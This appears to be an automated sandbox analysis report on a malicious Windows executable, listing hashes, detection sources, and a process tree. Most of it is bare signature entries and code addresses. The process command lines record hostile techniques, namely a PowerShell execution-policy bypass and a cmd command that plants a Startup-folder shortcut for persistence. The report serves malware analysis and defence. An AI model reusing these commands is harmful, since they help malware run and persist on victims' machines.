Windows
Analysis Report
T6l6gPxwQU.exe
Overview
General Information
Sample name: | T6l6gPxwQU.exerenamed because original name is a hash value |
Original sample name: | fca042b18adf613d9a2be1646663698f.exe |
Analysis ID: | 1528376 |
MD5: | fca042b18adf613d9a2be1646663698f |
SHA1: | a7c91cd17ceeb8b1d0ac9873723f2b35487ca50c |
SHA256: | 3e358ac78679758f3720dd60d4e5fdff8323f2de436add34238d39c9bf969460 |
Tags: | 64exe |
Infos: | |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- T6l6gPxwQU.exe (PID: 7348 cmdline:
"C:\Users\ user\Deskt op\T6l6gPx wQU.exe" MD5: FCA042B18ADF613D9A2BE1646663698F) - powershell.exe (PID: 7364 cmdline:
powershell .exe -Exec utionPolic y Bypass - File "C:\U sers\Publi c\ProfileD etails.ps1 " MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7372 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - InformationCheck.exe (PID: 7604 cmdline:
"C:\Users\ Public\Inf ormationCh eck.exe" C :\Users\Pu blic\Detai ls.au3 MD5: C56B5F0201A3B3DE53E561FE76912BFD) - cmd.exe (PID: 7660 cmdline:
cmd /k ech o [Interne tShortcut] > "C:\Use rs\user\Ap pData\Roam ing\Micros oft\Window s\Start Me nu\Program s\Startup\ SwiftWrite .url" & ec ho URL="C: \Users\use r\AppData\ Local\Word Genius Tec hnologies\ SwiftWrite .js" >> "C :\Users\us er\AppData \Roaming\M icrosoft\W indows\Sta rt Menu\Pr ograms\Sta rtup\Swift Write.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7668 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 7904 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Loc al\WordGen ius Techno logies\Swi ftWrite.js " MD5: A47CBE969EA935BDD3AB568BB126BC80) - SwiftWrite.pif (PID: 8028 cmdline:
"C:\Users\ user\AppDa ta\Local\W ordGenius Technologi es\SwiftWr ite.pif" " C:\Users\u ser\AppDat a\Local\Wo rdGenius T echnologie s\G" MD5: C56B5F0201A3B3DE53E561FE76912BFD)
- cleanup
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems), Tim Shelton: |
Source: | Author: Max Altgelt (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: frack113: |
Source: | Author: Max Altgelt (Nextron Systems): |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Data Obfuscation |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
AV Detection |
---|
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | Joe Sandbox ML: |
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Code function: | 0_2_00007FF6BB19BC70 | |
Source: | Code function: | 0_2_00007FF6BB1A72A8 | |
Source: | Code function: | 0_2_00007FF6BB1A71F4 | |
Source: | Code function: | 0_2_00007FF6BB19B7C0 | |
Source: | Code function: | 0_2_00007FF6BB162F50 | |
Source: | Code function: | 0_2_00007FF6BB1AA4F8 | |
Source: | Code function: | 0_2_00007FF6BB1AA350 | |
Source: | Code function: | 0_2_00007FF6BB1A6428 | |
Source: | Code function: | 0_2_00007FF6BB1AA874 | |
Source: | Code function: | 0_2_00007FF6BB19C7C0 | |
Source: | Code function: | 3_2_00594005 | |
Source: | Code function: | 3_2_0059494A | |
Source: | Code function: | 3_2_0059C2FF | |
Source: | Code function: | 3_2_0059CD14 | |
Source: | Code function: | 3_2_0059CD9F | |
Source: | Code function: | 3_2_0059F5D8 | |
Source: | Code function: | 3_2_0059F735 | |
Source: | Code function: | 3_2_0059FA36 | |
Source: | Code function: | 3_2_00593CE2 | |
Source: | Code function: | 10_2_00904005 | |
Source: | Code function: | 10_2_0090494A | |
Source: | Code function: | 10_2_0090C2FF | |
Source: | Code function: | 10_2_0090CD9F | |
Source: | Code function: | 10_2_0090CD14 | |
Source: | Code function: | 10_2_0090F5D8 | |
Source: | Code function: | 10_2_0090F735 | |
Source: | Code function: | 10_2_0090FA36 | |
Source: | Code function: | 10_2_00903CE2 |
Source: | JA3 fingerprint: |
Source: | HTTP traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | Code function: | 0_2_00007FF6BB1AE968 |
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: |
Source: | Code function: | 0_2_00007FF6BB1B0D24 |
Source: | Code function: | 0_2_00007FF6BB1B0D24 | |
Source: | Code function: | 3_2_005A4830 | |
Source: | Code function: | 10_2_00914830 |
Source: | Code function: | 0_2_00007FF6BB1B0A6C |
Source: | Code function: | 0_2_00007FF6BB121CEC |
Source: | Code function: | 3_2_005BD164 | |
Source: | Code function: | 10_2_0092D164 |
System Summary |
---|
Source: | Code function: | 0_2_00007FF6BB1237B0 | |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | memstr_5e6fb49a-f | |
Source: | String found in binary or memory: | memstr_b81c1be3-9 |
Source: | COM Object queried: | Jump to behavior |
Source: | Code function: | 0_2_00007FF6BB19C054 |
Source: | Code function: | 0_2_00007FF6BB18D2C4 |
Source: | Code function: | 0_2_00007FF6BB19D750 | |
Source: | Code function: | 3_2_00595778 | |
Source: | Code function: | 10_2_00905778 |
Source: | Code function: | 0_2_00007FF6BB1BF630 | |
Source: | Code function: | 0_2_00007FF6BB132E30 | |
Source: | Code function: | 0_2_00007FF6BB133C20 | |
Source: | Code function: | 0_2_00007FF6BB13FA4F | |
Source: | Code function: | 0_2_00007FF6BB1CDB18 | |
Source: | Code function: | 0_2_00007FF6BB15793C | |
Source: | Code function: | 0_2_00007FF6BB12B9F0 | |
Source: | Code function: | 0_2_00007FF6BB1A1A18 | |
Source: | Code function: | 0_2_00007FF6BB1CBA0C | |
Source: | Code function: | 0_2_00007FF6BB1B206C | |
Source: | Code function: | 0_2_00007FF6BB14C130 | |
Source: | Code function: | 0_2_00007FF6BB125F3C | |
Source: | Code function: | 0_2_00007FF6BB12BE70 | |
Source: | Code function: | 0_2_00007FF6BB14BEB4 | |
Source: | Code function: | 0_2_00007FF6BB12B390 | |
Source: | Code function: | 0_2_00007FF6BB16529C | |
Source: | Code function: | 0_2_00007FF6BB1B32AC | |
Source: | Code function: | 0_2_00007FF6BB12183C | |
Source: | Code function: | 0_2_00007FF6BB161840 | |
Source: | Code function: | 0_2_00007FF6BB19D87C | |
Source: | Code function: | 0_2_00007FF6BB1358D0 | |
Source: | Code function: | 0_2_00007FF6BB14F8D0 | |
Source: | Code function: | 0_2_00007FF6BB151750 | |
Source: | Code function: | 0_2_00007FF6BB1D17C0 | |
Source: | Code function: | 0_2_00007FF6BB1B56A0 | |
Source: | Code function: | 0_2_00007FF6BB1595B0 | |
Source: | Code function: | 0_2_00007FF6BB162D20 | |
Source: | Code function: | 0_2_00007FF6BB1B6C34 | |
Source: | Code function: | 0_2_00007FF6BB122AE0 | |
Source: | Code function: | 0_2_00007FF6BB1C0AEC | |
Source: | Code function: | 0_2_00007FF6BB1530DC | |
Source: | Code function: | 0_2_00007FF6BB130E70 | |
Source: | Code function: | 0_2_00007FF6BB140E90 | |
Source: | Code function: | 0_2_00007FF6BB1CCE8C | |
Source: | Code function: | 0_2_00007FF6BB166DE4 | |
Source: | Code function: | 0_2_00007FF6BB1584C0 | |
Source: | Code function: | 0_2_00007FF6BB144514 | |
Source: | Code function: | 0_2_00007FF6BB1B8360 | |
Source: | Code function: | 0_2_00007FF6BB1A83D4 | |
Source: | Code function: | 0_2_00007FF6BB14C3FC | |
Source: | Code function: | 0_2_00007FF6BB162400 | |
Source: | Code function: | 0_2_00007FF6BB1402C4 | |
Source: | Code function: | 0_2_00007FF6BB1B6320 | |
Source: | Code function: | 0_2_00007FF6BB15A8A0 | |
Source: | Code function: | 0_2_00007FF6BB1667F0 | |
Source: | Code function: | 0_2_00007FF6BB1CC6D4 | |
Source: | Code function: | 0_2_00007FF6BB1C055C | |
Source: | Code function: | 0_2_00007FF6BB1CA59C | |
Source: | Code function: | 1_2_00007FFD9B7E211D | |
Source: | Code function: | 3_2_0053B020 | |
Source: | Code function: | 3_2_005394E0 | |
Source: | Code function: | 3_2_00539C80 | |
Source: | Code function: | 3_2_005523F5 | |
Source: | Code function: | 3_2_005B8400 | |
Source: | Code function: | 3_2_00566502 | |
Source: | Code function: | 3_2_0056265E | |
Source: | Code function: | 3_2_0053E6F0 | |
Source: | Code function: | 3_2_0055282A | |
Source: | Code function: | 3_2_005689BF | |
Source: | Code function: | 3_2_00566A74 | |
Source: | Code function: | 3_2_005B0A3A | |
Source: | Code function: | 3_2_00540BE0 | |
Source: | Code function: | 3_2_0055CD51 | |
Source: | Code function: | 3_2_0058EDB2 | |
Source: | Code function: | 3_2_00598E44 | |
Source: | Code function: | 3_2_005B0EB7 | |
Source: | Code function: | 3_2_00566FE6 | |
Source: | Code function: | 3_2_005533B7 | |
Source: | Code function: | 3_2_0054D45D | |
Source: | Code function: | 3_2_0055F409 | |
Source: | Code function: | 3_2_00531663 | |
Source: | Code function: | 3_2_0054F628 | |
Source: | Code function: | 3_2_005516B4 | |
Source: | Code function: | 3_2_0053F6A0 | |
Source: | Code function: | 3_2_005578C3 | |
Source: | Code function: | 3_2_0055DBA5 | |
Source: | Code function: | 3_2_00551BA8 | |
Source: | Code function: | 3_2_00569CE5 | |
Source: | Code function: | 3_2_0054DD28 | |
Source: | Code function: | 3_2_0055BFD6 | |
Source: | Code function: | 3_2_00551FC0 | |
Source: | Code function: | 10_2_008AB020 | |
Source: | Code function: | 10_2_008A94E0 | |
Source: | Code function: | 10_2_008A9C80 | |
Source: | Code function: | 10_2_008C23F5 | |
Source: | Code function: | 10_2_00928400 | |
Source: | Code function: | 10_2_008D6502 | |
Source: | Code function: | 10_2_008AE6F0 | |
Source: | Code function: | 10_2_008D265E | |
Source: | Code function: | 10_2_008C282A | |
Source: | Code function: | 10_2_008D89BF | |
Source: | Code function: | 10_2_00920A3A | |
Source: | Code function: | 10_2_008D6A74 | |
Source: | Code function: | 10_2_008B0BE0 | |
Source: | Code function: | 10_2_008FEDB2 | |
Source: | Code function: | 10_2_008CCD51 | |
Source: | Code function: | 10_2_00920EB7 | |
Source: | Code function: | 10_2_00908E44 | |
Source: | Code function: | 10_2_008D6FE6 | |
Source: | Code function: | 10_2_008C33B7 | |
Source: | Code function: | 10_2_008CF409 | |
Source: | Code function: | 10_2_008BD45D | |
Source: | Code function: | 10_2_008AF6A0 | |
Source: | Code function: | 10_2_008C16B4 | |
Source: | Code function: | 10_2_008BF628 | |
Source: | Code function: | 10_2_008A1663 | |
Source: | Code function: | 10_2_008C78C3 | |
Source: | Code function: | 10_2_008C1BA8 | |
Source: | Code function: | 10_2_008CDBA5 | |
Source: | Code function: | 10_2_008D9CE5 | |
Source: | Code function: | 10_2_008BDD28 | |
Source: | Code function: | 10_2_008C1FC0 | |
Source: | Code function: | 10_2_008CBFD6 |
Source: | Dropped File: | ||
Source: | Dropped File: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | Code function: | 0_2_00007FF6BB1A3778 |
Source: | Code function: | 0_2_00007FF6BB18D5CC | |
Source: | Code function: | 0_2_00007FF6BB18CCE0 | |
Source: | Code function: | 3_2_00588DE9 | |
Source: | Code function: | 3_2_00589399 | |
Source: | Code function: | 10_2_008F8DE9 | |
Source: | Code function: | 10_2_008F9399 |
Source: | Code function: | 0_2_00007FF6BB1A59D8 |
Source: | Code function: | 0_2_00007FF6BB19BE00 |
Source: | Code function: | 0_2_00007FF6BB1B7E38 |
Source: | Code function: | 0_2_00007FF6BB126580 |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | Static PE information: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | ReversingLabs: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Static file information: |
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Code function: | 0_2_00007FF6BB1932F4 |
Source: | Code function: | 0_2_00007FF6BB1573A2 | |
Source: | Code function: | 0_2_00007FF6BB157904 | |
Source: | Code function: | 1_2_00007FFD9B7E430D | |
Source: | Code function: | 1_2_00007FFD9B7E00C1 | |
Source: | Code function: | 3_2_0055E941 | |
Source: | Code function: | 3_2_0055EA5A | |
Source: | Code function: | 3_2_00598A4C | |
Source: | Code function: | 3_2_00558B88 | |
Source: | Code function: | 3_2_0054CBF8 | |
Source: | Code function: | 3_2_0055EC35 | |
Source: | Code function: | 3_2_0055ED1E | |
Source: | Code function: | 10_2_008CE941 | |
Source: | Code function: | 10_2_008CEA5A | |
Source: | Code function: | 10_2_00908A4C | |
Source: | Code function: | 10_2_008BCBF8 | |
Source: | Code function: | 10_2_008C8B88 | |
Source: | Code function: | 10_2_008CEC35 | |
Source: | Code function: | 10_2_008CED1E |
Persistence and Installation Behavior |
---|
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Boot Survival |
---|
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Code function: | 0_2_00007FF6BB144514 | |
Source: | Code function: | 3_2_005B59B3 | |
Source: | Code function: | 3_2_00545EDA | |
Source: | Code function: | 10_2_009259B3 | |
Source: | Code function: | 10_2_008B5EDA |
Source: | Code function: | 3_2_005533B7 |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Evasive API call chain: | ||
Source: | Evasive API call chain: |
Source: | API coverage: | ||
Source: | API coverage: | ||
Source: | API coverage: |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Code function: | 0_2_00007FF6BB19BC70 | |
Source: | Code function: | 0_2_00007FF6BB1A72A8 | |
Source: | Code function: | 0_2_00007FF6BB1A71F4 | |
Source: | Code function: | 0_2_00007FF6BB19B7C0 | |
Source: | Code function: | 0_2_00007FF6BB162F50 | |
Source: | Code function: | 0_2_00007FF6BB1AA4F8 | |
Source: | Code function: | 0_2_00007FF6BB1AA350 | |
Source: | Code function: | 0_2_00007FF6BB1A6428 | |
Source: | Code function: | 0_2_00007FF6BB1AA874 | |
Source: | Code function: | 0_2_00007FF6BB19C7C0 | |
Source: | Code function: | 3_2_00594005 | |
Source: | Code function: | 3_2_0059494A | |
Source: | Code function: | 3_2_0059C2FF | |
Source: | Code function: | 3_2_0059CD14 | |
Source: | Code function: | 3_2_0059CD9F | |
Source: | Code function: | 3_2_0059F5D8 | |
Source: | Code function: | 3_2_0059F735 | |
Source: | Code function: | 3_2_0059FA36 | |
Source: | Code function: | 3_2_00593CE2 | |
Source: | Code function: | 10_2_00904005 | |
Source: | Code function: | 10_2_0090494A | |
Source: | Code function: | 10_2_0090C2FF | |
Source: | Code function: | 10_2_0090CD9F | |
Source: | Code function: | 10_2_0090CD14 | |
Source: | Code function: | 10_2_0090F5D8 | |
Source: | Code function: | 10_2_0090F735 | |
Source: | Code function: | 10_2_0090FA36 | |
Source: | Code function: | 10_2_00903CE2 |
Source: | Code function: | 0_2_00007FF6BB141D80 |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 0_2_00007FF6BB1B0A00 |
Source: | Code function: | 0_2_00007FF6BB1237B0 |
Source: | Code function: | 0_2_00007FF6BB145BC0 |
Source: | Code function: | 0_2_00007FF6BB1932F4 |
Source: | Code function: | 0_2_00007FF6BB18D408 |
Source: | Process token adjusted: | Jump to behavior |
Source: | Code function: | 0_2_00007FF6BB1459C8 | |
Source: | Code function: | 0_2_00007FF6BB1457E4 | |
Source: | Code function: | 0_2_00007FF6BB15AF58 | |
Source: | Code function: | 0_2_00007FF6BB168FE4 | |
Source: | Code function: | 3_2_0055A354 | |
Source: | Code function: | 3_2_0055A385 | |
Source: | Code function: | 10_2_008CA385 | |
Source: | Code function: | 10_2_008CA354 |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Process created: |
Source: | Code function: | 0_2_00007FF6BB18CE68 |
Source: | Code function: | 0_2_00007FF6BB1237B0 |
Source: | Code function: | 0_2_00007FF6BB199420 |
Source: | Code function: | 0_2_00007FF6BB19D158 |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Code function: | 0_2_00007FF6BB18C858 |
